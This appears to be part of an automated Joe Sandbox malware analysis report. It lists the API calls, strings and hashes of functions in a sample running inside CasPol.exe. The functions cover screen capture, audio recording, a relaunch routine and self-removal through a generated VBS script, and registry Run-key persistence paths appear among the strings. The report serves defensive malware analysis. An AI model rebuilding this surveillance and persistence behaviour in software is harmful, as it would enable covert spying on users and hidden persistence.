                                                                                                                                                              • Opcode Fuzzy Hash: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                                                                                                                                                              • Instruction Fuzzy Hash: DFD0A733504132638220176A7C0CC87EDADDFC5EB37024236F404C3621DA34C841C6F4
                                                                                                                                                              APIs
                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                              • String ID: GetLocaleInfoEx
                                                                                                                                                              • API String ID: 2299586839-2904428671
                                                                                                                                                              • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                                                              • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                                                                                                                              • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                                                              • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1663032902-0
                                                                                                                                                              • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                                                              • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                                                                                                                              • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                                                              • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00450E6A,00000001), ref: 00450DB4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                              • Opcode ID: 9d28c5e255c7ff7bf8c29f4c99fb410e4ec57aee4c7c61eda1ee1a9008b30fc6
                                                                                                                                                              • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                                                                                                                              • Opcode Fuzzy Hash: 9d28c5e255c7ff7bf8c29f4c99fb410e4ec57aee4c7c61eda1ee1a9008b30fc6
                                                                                                                                                              • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2692324296-0
                                                                                                                                                              • Opcode ID: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                                                                                              • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                                                                                                                              • Opcode Fuzzy Hash: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                                                                                                              • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(004510BA,00000001), ref: 00450E29
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                              • Opcode ID: 39b6845edf5822fb0cb5ec1b15846e624abd352d664abc6135ad0e1aa048f885
                                                                                                                                                              • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                                                                                                                              • Opcode Fuzzy Hash: 39b6845edf5822fb0cb5ec1b15846e624abd352d664abc6135ad0e1aa048f885
                                                                                                                                                              • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(-00471558,?,0044225B,00000000,0046DAC0,0000000C,00442216,0000000A,?,?,00448739,0000000A,?,00446F74,00000001,00000364), ref: 00444ADB
                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(Function_00047068,00000001,0046DC48,0000000C), ref: 004470E6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1272433827-0
                                                                                                                                                              • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                                                                              • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                                                                                                                              • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                                                                              • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00450C4E,00000001), ref: 00450D2E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                              • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                                                                              • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                                                                                                                              • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                                                                              • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                                                                                                                              APIs
                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                              • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                                                                              • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                                                                                                                              • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                              APIs
                                                                                                                                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                                                                                                                                • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                                                                                                                              • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                                                                                                                              • DeleteDC.GDI32(?), ref: 0041805D
                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00418060
                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                                                                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                                                                                                                              • GetCursorInfo.USER32(?), ref: 004180B5
                                                                                                                                                              • GetIconInfo.USER32(?,?), ref: 004180CB
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004180FA
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00418107
                                                                                                                                                              • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                                                                                                                              • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                                                                                                                              • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                                                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                                                                                                                              • DeleteDC.GDI32(?), ref: 0041827F
                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00418282
                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00418285
                                                                                                                                                              • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00418344
                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 0041834B
                                                                                                                                                              • DeleteDC.GDI32(?), ref: 0041835B
                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 00418366
                                                                                                                                                              • DeleteDC.GDI32(?), ref: 00418398
                                                                                                                                                              • DeleteDC.GDI32(00000000), ref: 0041839B
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004183A1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                                                                                                                                                              • String ID: DISPLAY
                                                                                                                                                              • API String ID: 1352755160-865373369
                                                                                                                                                              • Opcode ID: 22c96b6163cb50d8b2a0e7298f69cab473e7aa59f92580ce48d75f9de49cebd4
                                                                                                                                                              • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                                                                                                                              • Opcode Fuzzy Hash: 22c96b6163cb50d8b2a0e7298f69cab473e7aa59f92580ce48d75f9de49cebd4
                                                                                                                                                              • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                                                                                                                              APIs
                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                                                • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                                                • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                                                                                              • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                              • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                                                                                              • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                                                                              • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                                                                                • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                                                                                                                                • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                                                                                                                                • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                                                                              • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                                                                              • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                                                                                • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                                                                              • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                                                                              • API String ID: 4250697656-2665858469
                                                                                                                                                              • Opcode ID: c80fabc7b58b6664533cdc435cbe53a9781b5ca893f5b0e43887563f66929a29
                                                                                                                                                              • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                                                                                                                              • Opcode Fuzzy Hash: c80fabc7b58b6664533cdc435cbe53a9781b5ca893f5b0e43887563f66929a29
                                                                                                                                                              • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                                                • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,PFb,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                                                • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                                                • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                                                • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040C287
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                              • String ID: ")$.vbs$@CG$On Error Resume Next$PFb$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                                                                              • API String ID: 3797177996-2975395959
                                                                                                                                                              • Opcode ID: 54639b7d9ee10e7a81b53f3e46565cc10b582b28373b0b397b468ca4c2ae59ea
                                                                                                                                                              • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                                                                                                                              • Opcode Fuzzy Hash: 54639b7d9ee10e7a81b53f3e46565cc10b582b28373b0b397b468ca4c2ae59ea
                                                                                                                                                              • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                                                                                                                              APIs
                                                                                                                                                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                                                                                                                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                                                                                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                                                                                                                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                                                                                                                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                                                                                                                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                                                                                                                              • SetEvent.KERNEL32 ref: 0041A38A
                                                                                                                                                              • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                                                                                                                              • CloseHandle.KERNEL32 ref: 0041A3AB
                                                                                                                                                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                                                                                                                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.4180683046.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                                                                                              • API String ID: 738084811-1408154895
                                                                                                                                                              • Opcode ID: 512388ae3893cad5346b6d93e57f113ab9ba600bb7157453820f8d4955eb17cd
                                                                                                                                                              • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                                                                                                                              • Opcode Fuzzy Hash: 512388ae3893cad5346b6d93e57f113ab9ba600bb7157453820f8d4955eb17cd
                                                                                                                                                              • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                                                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
